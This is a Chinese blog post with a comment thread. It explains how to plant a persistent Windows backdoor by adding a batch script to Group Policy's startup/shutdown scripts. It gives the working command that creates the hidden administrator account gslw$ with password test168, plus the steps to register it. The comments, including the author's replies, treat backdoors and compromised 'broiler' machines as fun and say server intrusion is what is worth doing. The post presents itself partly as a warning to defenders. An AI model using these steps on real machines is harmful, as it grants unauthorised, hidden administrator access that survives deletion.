往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩,也为大家所熟知。其实,在最策略中也可以实现该功能,不仅如此它还可以实现在系统关机时进行某些操作。这就是通过最策略的“脚本(启动/关机)”项。具体位置在“计算机配置 → Windows设置”项下。因为其极具隐蔽性,常为大家所忽略,也更危险。
比如一个本地用户,临时获得了某台机器的操作权就可以通过这个后门实施对对主机的长期控制。它可以通过这个后门运行某些程序或者脚本,最简单的比如创建一个管理员用户,他可以这样做:
一、创建脚本
创建一个批处理文件add.bat,add.bat的内容是:
@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit
(创建一个用户名为 gslw$ 密码为 test168 的管理员用户)。
二、后门利用
在“运行”对话框中输入 gpedit.msc ,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加 add.bat 。就是说当系统关机时创建gslw$用户。对于一般的用户是根本不知道在系统中有一个隐藏用户,就是他看见并且删除了该用户,当系统关机或者重启是又会创建该用户。所以说,如果用户不知道组策略中的这个地方那他一定会感到莫名其妙。(图1)

图1 组策略脚本设置
其实,对于组策略中的这个“后门”还有很多利用法。有些远程攻击者通过它来运行脚本或者程序,嗅探管理员密码等等。当他们获取了管理员的密码后,就不用在系统中创建帐户了,直接利用管理员帐户远程登录系统。因此它也是“双刃剑”,希望大家重视这个地方。当你被攻击而莫名其妙时,说不定攻击者就是通过它实现的。


沙发
其实后门这个东西还是挺好玩的,比较老的有上兴远程控制!先让对方中木马开后门,然后直接登录到系统上获取管理权限,然后删除后门,直接让其变成肉鸡。
有了这个 才能出不少的电脑高手。
汗,这招不错,还一直没注意过,呵。。
走自己的后门让黑客们无门可走!。。PS:我博文可是推荐了你的哟,什么眼神~ - -
我又发现一个电脑高手 嘿嘿 不过这个后门建立起来好像很费劲儿哦
很强大~~~高手太多了~你就是其中一个吧
看来要请北街来帮我研究看看
[飞猪, 2010-03-24, 7:35 上午]
嗯,是滴~
@上善若水 我这里的沙发舒服不?呵呵
@棺材中的尘埃 嗯,其实肉鸡还是很多的~只是有部分不值得利用!
@园子 其实系统中的学问还是蛮大的~呵呵
@忧郁小样 赶紧试试~哈哈
@羽中 我得配眼镜了……
@无名博客 不费劲的话,全世界都是黑客了~

@sk 偶是小菜鸟~
@Firm 研究什么哦?
@飞猪 飞猪兄抬举了……
这个以前经常被用于服务器后门使用....
@北街 看着有技术的人就是羡慕哦,做黑客很难吧?
来过了,博客不错,赞!!
又学到东西了。
确实很常见的方式,呵呵
@小辉网 看来小辉也是高手~
@muxiaku 是啊,入侵服务器才有价值
@无名博客 我觉得挺难的~